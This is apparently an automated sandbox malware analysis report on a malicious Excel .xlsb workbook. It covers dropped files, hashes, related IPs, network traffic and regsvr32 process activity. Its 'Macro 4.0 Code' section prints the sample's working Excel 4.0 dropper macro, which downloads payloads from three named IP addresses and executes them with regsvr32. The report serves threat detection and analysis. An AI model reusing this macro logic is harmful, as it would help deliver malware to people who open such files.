                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 5
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsb
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                07:40:30API Interceptor3x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                185.104.195.81SRLTX-827324351.xlsbGet hashmaliciousBrowse
                • 185.104.195.81/767224823161.dat
                SRLTX-827324351.xlsbGet hashmaliciousBrowse
                • 185.104.195.81/319199189746.dat
                101.99.95.15SRLTX-207074251.xlsbGet hashmaliciousBrowse
                  SRLTX-207074251.xlsbGet hashmaliciousBrowse
                    SRLTX-827324351.xlsbGet hashmaliciousBrowse
                      SRLTX-827324351.xlsbGet hashmaliciousBrowse
                        80.71.157.224SRLTX-207074251.xlsbGet hashmaliciousBrowse
                          SRLTX-207074251.xlsbGet hashmaliciousBrowse
                            SRLTX-827324351.xlsbGet hashmaliciousBrowse
                              SRLTX-827324351.xlsbGet hashmaliciousBrowse

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYSRLTX-207074251.xlsbGet hashmaliciousBrowse
                                • 101.99.95.15
                                SRLTX-207074251.xlsbGet hashmaliciousBrowse
                                • 101.99.95.15
                                exel.exeGet hashmaliciousBrowse
                                • 111.90.143.12
                                SRLTX-827324351.xlsbGet hashmaliciousBrowse
                                • 101.99.95.15
                                SRLTX-827324351.xlsbGet hashmaliciousBrowse
                                • 101.99.95.15
                                jydygx.armGet hashmaliciousBrowse
                                • 101.99.125.127
                                9LC8BVglps.exeGet hashmaliciousBrowse
                                • 111.90.158.95
                                purchase_order.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                24390844104405462,pdf.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                YaMfg60AB4.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                EDyyOwFu2Y.rtfGet hashmaliciousBrowse
                                • 111.90.149.196
                                PaymentCopy-18112021.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                Halkbank,pdf.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                ACILISTEK.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                111821 New Order_xlxs.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                invoice.pdf.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                ujbZuYEbJR.exeGet hashmaliciousBrowse
                                • 111.90.149.196
                                INVOICE - FIRST 2 CONTAINERS 111.xlsxGet hashmaliciousBrowse
                                • 111.90.149.196
                                #Ud83d#Udcdewav_audio__Atlanticare__#985850.HTMGet hashmaliciousBrowse
                                • 111.90.145.235
                                setup_x86_x64_install.exeGet hashmaliciousBrowse
                                • 111.90.158.95
                                PARKNET-ASDKSRLTX-207074251.xlsbGet hashmaliciousBrowse
                                • 80.71.157.224
                                SRLTX-207074251.xlsbGet hashmaliciousBrowse
                                • 80.71.157.224
                                SRLTX-827324351.xlsbGet hashmaliciousBrowse
                                • 80.71.157.224
                                SRLTX-827324351.xlsbGet hashmaliciousBrowse
                                • 80.71.157.224
                                F2433DFBA69148A0C3A5A5951D360B6C3C045090DE06F.exeGet hashmaliciousBrowse
                                • 80.71.158.167
                                0PTqb4jxab.exeGet hashmaliciousBrowse
                                • 80.71.158.106
                                QJX8FxGICW.exeGet hashmaliciousBrowse
                                • 80.71.158.106
                                CbQPj4t8t8.exeGet hashmaliciousBrowse
                                • 80.71.158.106
                                ykHVrz0Rhn.exeGet hashmaliciousBrowse
                                • 80.71.158.106
                                BW3YgASkbP.exeGet hashmaliciousBrowse
                                • 80.71.158.106
                                ZxsTMGzhcI.exeGet hashmaliciousBrowse
                                • 80.71.158.106
                                CI + PL.docxGet hashmaliciousBrowse
                                • 80.71.158.94
                                4o6tbR4nsFGet hashmaliciousBrowse
                                • 194.62.170.231
                                wFob8Dpa4zGet hashmaliciousBrowse
                                • 80.71.137.238
                                taugif.exeGet hashmaliciousBrowse
                                • 80.71.138.195
                                AFRARASAIRSRLTX-207074251.xlsbGet hashmaliciousBrowse
                                • 185.104.195.81
                                SRLTX-207074251.xlsbGet hashmaliciousBrowse
                                • 185.104.195.81
                                SRLTX-827324351.xlsbGet hashmaliciousBrowse
                                • 185.104.195.81
                                SRLTX-827324351.xlsbGet hashmaliciousBrowse
                                • 185.104.195.81
                                Hilix.arm7Get hashmaliciousBrowse
                                • 185.49.104.0
                                BitmCvTrdOGet hashmaliciousBrowse
                                • 185.49.104.4
                                17Rom1F3MYGet hashmaliciousBrowse
                                • 185.49.104.8
                                Yx8iF6YZtNGet hashmaliciousBrowse
                                • 185.49.104.3
                                SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                • 185.118.15.137
                                SecuriteInfo.com.Exploit.Siggen3.10048.14515.xlsGet hashmaliciousBrowse
                                • 185.118.15.137

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E5B98A58.jpg
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1098x988, frames 3
                                Category:dropped
                                Size (bytes):85681
                                Entropy (8bit):7.915850776614707
                                Encrypted:false
                                SSDEEP:1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit
                                MD5:4F100E2CEFED046B44EC799015B454EF
                                SHA1:5149E5D1B5212C77B3548914E9B47D67B4BEA574
                                SHA-256:D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C
                                SHA-512:153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: ......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm...........J..".................................................".............................................................q.[..+...*...K.... ..............?.......g....6..)....=~....................w5...........7_.-.......k.../...;.........!.z%o..w!....,.............?...Gs?.].......C..P~i.._.=..`....{...w....."..-........:..d.....................;z7)...~g........C....v..\..O.....0...v........v... ............A...;.~Y.}.....MsC.~..5..?.;.........V7....G...b..~...........@................O.}...o4.s_...z78.1.yl...X~.u..~..S....J..V~S..x.u~.. ..............@....u..m....rGrf.P.._+Z..?AW..~..u.G....................o&..................................................................9.0...H.Zx...M.y.[kW..o......;.....z......}v.m..[R.i....R..m....+.J............r6.P....|s..].vO._.}..K.]-V.U=9}........W......3.....G.t}Y
                                C:\Users\user\Desktop\11750000
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Microsoft Excel 2007+
                                Category:dropped
                                Size (bytes):99173
                                Entropy (8bit):7.829749204687144
                                Encrypted:false
                                SSDEEP:1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsULkFKJ:I3c6EehCfCZpUHKGXbBKsiiJgJ
                                MD5:C827763DB12655106D4C2A35D67B6142
                                SHA1:E9BC340F643F9D8372D27F7D53848CD5AA6B92F1
                                SHA-256:A1B5A84C413D1C25DBEF36E0E0EF2D2837D7D94398B985279BE932A31B6B186B
                                SHA-512:11179E2DA1D3C7BBB1E2FFA5D608693FD28014990599D2C3581B8F023C59A094FF3330089C3E25B60F1D8A329EFAAB216FEA5FAEC562FA4717761A3B64870950
                                Malicious:false
                                Reputation:low
                                Preview: PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...
                                C:\Users\user\Desktop\11750000:Zone.Identifier
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: [ZoneTransfer]....ZoneId=0
                                C:\Users\user\Desktop\SRLTX-1266305223.xlsb (copy)
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Microsoft Excel 2007+
                                Category:dropped
                                Size (bytes):99173
                                Entropy (8bit):7.829749204687144
                                Encrypted:false
                                SSDEEP:1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsULkFKJ:I3c6EehCfCZpUHKGXbBKsiiJgJ
                                MD5:C827763DB12655106D4C2A35D67B6142
                                SHA1:E9BC340F643F9D8372D27F7D53848CD5AA6B92F1
                                SHA-256:A1B5A84C413D1C25DBEF36E0E0EF2D2837D7D94398B985279BE932A31B6B186B
                                SHA-512:11179E2DA1D3C7BBB1E2FFA5D608693FD28014990599D2C3581B8F023C59A094FF3330089C3E25B60F1D8A329EFAAB216FEA5FAEC562FA4717761A3B64870950
                                Malicious:true
                                Reputation:low
                                Preview: PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...
                                C:\Users\user\Desktop\~$SRLTX-1266305223.xlsb
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                Static File Info

                                General

                                File type:Microsoft Excel 2007+
                                Entropy (8bit):7.829454136800251
                                TrID:
                                • Microsoft Excel Office Binary workbook document (40504/1) 83.51%
                                • ZIP compressed archive (8000/1) 16.49%
                                File name:SRLTX-1266305223.xlsb
                                File size:99421
                                MD5:9a33b86fa2ee2372023d418129238b25
                                SHA1:d94101917d187df6bd710f2abf288cf9f2ee86c9
                                SHA256:141a23ce14ba6702fdba9d074fe66eab9f9084be7030033b0258656942a3c660
                                SHA512:28d7272b22f2745a1ee9dae5d904125cce3bd1e6fcd4e106cf2e32cf2be9b09198596f02043a03ce03158e9674dd4e80b91a706e7a35699cc7b6507f2acf0c9b
                                SSDEEP:1536:cA/B5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU/B:cAic6EehCfCZpUHKGXbBKsii+B
                                File Content Preview:PK..........!...~.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                File Icon

                                Icon Hash:e4e2ea8aa4b4b4b4

                                Static OLE Info

                                General

                                Document Type:OpenXML
                                Number of OLE Files:1

                                OLE File "SRLTX-1266305223.xlsb"

                                Indicators

                                Has Summary Info:
                                Application Name:
                                Encrypted Document:
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:

                                Macro 4.0 Code

                                8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
                                9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
                                10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
                                15,6,=EXEC("regsvr32  C:\ProgramData\Volet1.ocx")
                                16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
                                17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
                                23,6,=HALT()
                                
                                0,0,435435
                                1,7,34
                                2,1,5
                                3,8,345
                                5,10,6
                                6,8,6
                                7,9,3434
                                7,14,34543
                                8,1,6
                                8,11,435435
                                9,1,34
                                10,1,5
                                10,10,3
                                10,11,34
                                11,2,436
                                11,8,7
                                13,2,5
                                13,9,547
                                14,8,5
                                16,9,7
                                16,12,34
                                17,3,="uRlMon"
                                18,3,="URLDownloadTo"
                                19,2,34
                                19,3,="JJCCBB"
                                19,10,5
                                20,4,80.71.157.224/
                                21,4,101.99.95.15/
                                21,6,=RANDBETWEEN(142536473,988879789754)
                                21,9,5
                                22,4,185.104.195.81/
                                22,6,=".dat"
                                22,8,34
                                23,4,4
                                23,6,=".dat2"
                                24,4,5
                                24,6,=REGISTER(D18,D19&"FileA",D20,"Drozd",,1,9)
                                25,4,6
                                37,6,=GOTO(Tiposa1!G8)
                                57,12,5654
                                60,14,54654
                                61,16,6546
                                62,12,54654
                                63,13,546
                                63,15,456
                                64,14,54654
                                

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 2, 2021 07:38:01.041908979 CET4916580192.168.2.2280.71.157.224
                                Dec 2, 2021 07:38:04.057291031 CET4916580192.168.2.2280.71.157.224
                                Dec 2, 2021 07:38:10.063935995 CET4916580192.168.2.2280.71.157.224
                                Dec 2, 2021 07:38:22.064822912 CET4916680192.168.2.2280.71.157.224
                                Dec 2, 2021 07:38:25.072634935 CET4916680192.168.2.2280.71.157.224
                                Dec 2, 2021 07:38:31.079011917 CET4916680192.168.2.2280.71.157.224
                                Dec 2, 2021 07:38:43.124475002 CET4916780192.168.2.22101.99.95.15
                                Dec 2, 2021 07:38:46.134341002 CET4916780192.168.2.22101.99.95.15
                                Dec 2, 2021 07:38:52.140830040 CET4916780192.168.2.22101.99.95.15
                                Dec 2, 2021 07:39:04.139341116 CET4916880192.168.2.22101.99.95.15
                                Dec 2, 2021 07:39:07.149514914 CET4916880192.168.2.22101.99.95.15
                                Dec 2, 2021 07:39:13.155961990 CET4916880192.168.2.22101.99.95.15
                                Dec 2, 2021 07:39:25.201348066 CET4916980192.168.2.22185.104.195.81
                                Dec 2, 2021 07:39:28.211273909 CET4916980192.168.2.22185.104.195.81
                                Dec 2, 2021 07:39:34.217669964 CET4916980192.168.2.22185.104.195.81
                                Dec 2, 2021 07:39:46.233407974 CET4917080192.168.2.22185.104.195.81
                                Dec 2, 2021 07:39:49.242005110 CET4917080192.168.2.22185.104.195.81
                                Dec 2, 2021 07:39:55.248558998 CET4917080192.168.2.22185.104.195.81

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:07:38:11
                                Start date:02/12/2021
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x13f880000
                                File size:28253536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:07:40:20
                                Start date:02/12/2021
                                Path:C:\Windows\System32\regsvr32.exe
                                Wow64 process (32bit):false
                                Commandline:regsvr32 C:\ProgramData\Volet1.ocx
                                Imagebase:0xff340000
                                File size:19456 bytes
                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:07:40:21
                                Start date:02/12/2021
                                Path:C:\Windows\System32\regsvr32.exe
                                Wow64 process (32bit):false
                                Commandline:regsvr32 C:\ProgramData\Volet2.ocx
                                Imagebase:0xff340000
                                File size:19456 bytes
                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:07:40:21
                                Start date:02/12/2021
                                Path:C:\Windows\System32\regsvr32.exe
                                Wow64 process (32bit):false
                                Commandline:regsvr32 C:\ProgramData\Volet3.ocx
                                Imagebase:0xff340000
                                File size:19456 bytes
                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Executed Functions

                                  Non-executed Functions

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.933446356.0000000002F90000.00000004.00000001.sdmp, Offset: 02F90000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef939adf097756e4b017e2ce71f5899ba240282824a895fc226724402422dc4c
                                  • Instruction ID: 7fe84262055e26b30becf3d4045706cdf2bba8a3895659d084734764bdd8ccb6
                                  • Opcode Fuzzy Hash: ef939adf097756e4b017e2ce71f5899ba240282824a895fc226724402422dc4c
                                  • Instruction Fuzzy Hash: D172765154E3D11FD70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.933446356.0000000002F90000.00000004.00000001.sdmp, Offset: 02F90000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ee99153d608fc48a09d8b4bba1c051bebf92d5912a9a46efdf9ae5b7a987725
                                  • Instruction ID: c711feb18255120fb6ff7153014ae4070f73ecc951e37d83362b387c7e3ee7e1
                                  • Opcode Fuzzy Hash: 0ee99153d608fc48a09d8b4bba1c051bebf92d5912a9a46efdf9ae5b7a987725
                                  • Instruction Fuzzy Hash: 3D72765154E3D11FD70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.933446356.0000000002F90000.00000004.00000001.sdmp, Offset: 02F90000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4b5757ec0c83640c64ed5a8bf0080d43203fa2953d2309e477ec1952686fc334
                                  • Instruction ID: 0a4f80c09a598d3ff658089ea94cf5703a4ffc7c067fb4b60151e58ab0f7ae16
                                  • Opcode Fuzzy Hash: 4b5757ec0c83640c64ed5a8bf0080d43203fa2953d2309e477ec1952686fc334
                                  • Instruction Fuzzy Hash: 6B72755154E3D11FD70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.933446356.0000000002F90000.00000004.00000001.sdmp, Offset: 02F90000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bd3746452b57aeb1a805ed014c551d0503d66bf58f7bc2f8a8be067bf19f616
                                  • Instruction ID: 93ce3a9501fc12ec149e642806c6866efcb05bec15651a085a2f554958de11fb
                                  • Opcode Fuzzy Hash: 7bd3746452b57aeb1a805ed014c551d0503d66bf58f7bc2f8a8be067bf19f616
                                  • Instruction Fuzzy Hash: 7272765154E3D11FC70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.933446356.0000000002F90000.00000004.00000001.sdmp, Offset: 02F90000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 55f7aa5e46d1b3910a7f506b712b20c7d8822a6ccf25430664cb8e1d937aca64
                                  • Instruction ID: 561c795f32ca0cc8961b81508445235196e5975a28ce73b2eb82a336f3317603
                                  • Opcode Fuzzy Hash: 55f7aa5e46d1b3910a7f506b712b20c7d8822a6ccf25430664cb8e1d937aca64
                                  • Instruction Fuzzy Hash: 1FC1405545E3D21FE71383780EB95927FB18E87158B2E15CBC2C1DF4A3EA180A6AD723
                                  Uniqueness

                                  Uniqueness Score: -1.00%